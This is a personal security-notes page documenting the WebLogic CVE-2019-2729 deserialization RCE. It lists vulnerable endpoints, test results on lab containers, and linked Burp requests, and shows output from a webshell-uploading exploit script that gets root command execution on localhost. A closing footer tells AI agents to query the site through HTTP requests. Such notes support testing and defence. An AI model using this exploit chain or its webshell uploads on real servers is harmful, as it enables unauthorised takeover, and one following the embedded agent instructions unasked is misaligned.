# WebLogic - CVE-2019-2729

Oracle WebLogic server is affected by a **remote code execution** vulnerability in `wls-wsat.war` and `wls9_async_response.war` packages due to unsafe deserialization of Java objects. A remote **unauthenticated** attacker can exploit the issue by sending a custom Java serialized object via HTTP request to execute arbitrary Java code in the context of the web server.

Exploiting `wls-wsat.war` will return command output, while `wls9_async_response.war` is blind.

Affected versions: **10.3.6.0.0**, **12.1.3.0.0** and **12.2.1.3.0**

### **Vulnerable endpoints**

<pre class="language-bash"><code class="lang-bash">## wls-wsat.war (cmd response)
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

## wls9_async_response.war (blind)
<strong>/_async/AsyncResponseService
</strong></code></pre>

### Test data

<table><thead><tr><th width="130">Version</th><th width="199">Image</th><th width="145">Result</th><th>Reason</th></tr></thead><tbody><tr><td>10.3.6.0</td><td><a href="https://hub.docker.com/layers/vulhub/weblogic/10.3.6.0-2017/images/sha256-275ec19477cfda389dc1c42158033e7e8c650dd4cba9f090ca0ba673902b73c9?context=explore">VulnHub 10.3.6.0-2017</a></td><td>Vulnerable</td><td>wls-wsat deserialization</td></tr><tr><td>12.2.1.3</td><td><a href="https://hub.docker.com/layers/vulhub/weblogic/12.2.1.3-2018/images/sha256-8ddf63df92426e521e60c2db913602394a799921fb3919094aef012e3ad6b13f?context=explore">VulnHub 12.2.1.3-2018</a></td><td>Not vulnerable</td><td>Endpoints missing</td></tr><tr><td>12.2.1.3</td><td><a href="https://hub.docker.com/layers/vulhub/weblogic/12.2.1.3/images/sha256-8ddf63df92426e521e60c2db913602394a799921fb3919094aef012e3ad6b13f?context=explore">VulnHub 12.2.1.3</a></td><td>Not vulnerable</td><td>Endpoints missing</td></tr><tr><td>12.2.1.3</td><td><a href="https://container-registry.oracle.com/ords/f?p=113:4:100763132084359:::4:P4_REPOSITORY,AI_REPOSITORY,AI_REPOSITORY_NAME,P4_REPOSITORY_NAME,P4_EULA_ID,P4_BUSINESS_AREA_ID:5,5,Oracle%20WebLogic%20Server,Oracle%20WebLogic%20Server,1,0&#x26;cs=3KTZ9kW4gHaVNXvYp_seg3AmnCL3G7pI4VfyLUNKH2oNI2LPL15b5PgGNbUGWjuU0cZz_Tul__-raSj8DmP2tQQ">weblogic:12.2.1.3</a></td><td>Inconclusive</td><td>"<em>Old format work area header is disabled."</em></td></tr></tbody></table>

[Request 01](https://github.com/0xPThree/WebLogic/blob/main/cve-2019-2725/burp-req01.txt), RCE on version 10.3.6.0:

<figure><img src="/files/z3LUwqNOzSjshTLM4Yqm" alt=""><figcaption></figcaption></figure>

[Request 02](https://github.com/0xPThree/WebLogic/blob/main/cve-2019-2725/burp-req02.txt), designed for version 10.2.7.1, RCE on 10.3.6.0:

<figure><img src="/files/gpzlETHdSFXeBzG0Rnjx" alt=""><figcaption></figcaption></figure>

[Request 03](https://github.com/0xPThree/WebLogic/blob/main/cve-2019-2725/burp-req03.txt), designed for version 10.3.6.0, RCE on 10.3.6.0:

<figure><img src="/files/mtFW3WnYhLuy03GceAIe" alt=""><figcaption></figcaption></figure>

[Request 04](https://github.com/0xPThree/WebLogic/blob/main/cve-2019-2725/burp-req04.txt), designed for version 10.3.6.2, RCE on 10.3.6.0:

<figure><img src="/files/ePz1UDZJ7v31FvPrfhPP" alt=""><figcaption></figcaption></figure>

[Request 05](https://github.com/0xPThree/WebLogic/blob/main/cve-2019-2725/burp-req05.txt), designed for version 12.2.1.3, error "Old format work area header is disabled." on version 12.2.1.3. Not sure if this is an error caused by my container, need more test data.

<figure><img src="/files/tbHf1zag21kLeCmK9Y78" alt=""><figcaption></figcaption></figure>

### Scripts

[`weblogic_get_webshell.py`](https://github.com/0xPThree/WebLogic/blob/main/cve-2019-2725/weblogic_get_webshell/weblogic_get_webshell.py) - runs three payloads on target at once, by [rootedshell](https://github.com/rootedshell/Weblogic/tree/master).

```bash
» python3 weblogic_get_webshell.py http://127.0.0.1:7003
--- payload2.txt (weblogic 10.3.6) ---
http://127.0.0.1:7003/wls-wsat/CoordinatorPortType
whoami : 
root
--- payload.txt, uploading webshell '.s8Jn4WlqX2c592.jsp' ---
http://127.0.0.1:7003/_async/.s8Jn4gWlqX2c592.jsp?cmd=whoami
Cookie:JSESSIONID=DxZLnCLX1y5BPn1Yw9GrpYVFR0NQQhyrk1qFXsQ1Pz2qQbW1lyKR!903277329; path=/; HttpOnly
whoami:
root
```

As there are few public exploits using the `/_async/` endpoint, I've modified *rootedshells* script to only upload a webshell and allow direct command execution. The script can be found [here](https://github.com/0xPThree/WebLogic/tree/main/cve-2019-2725/weblogic_webshell).

<figure><img src="/files/q9cCEBh7a39iFt2VHN9i" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xpthree.gitbook.io/notes/exploits-pocs/oracle/weblogic-cve-2019-2729.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.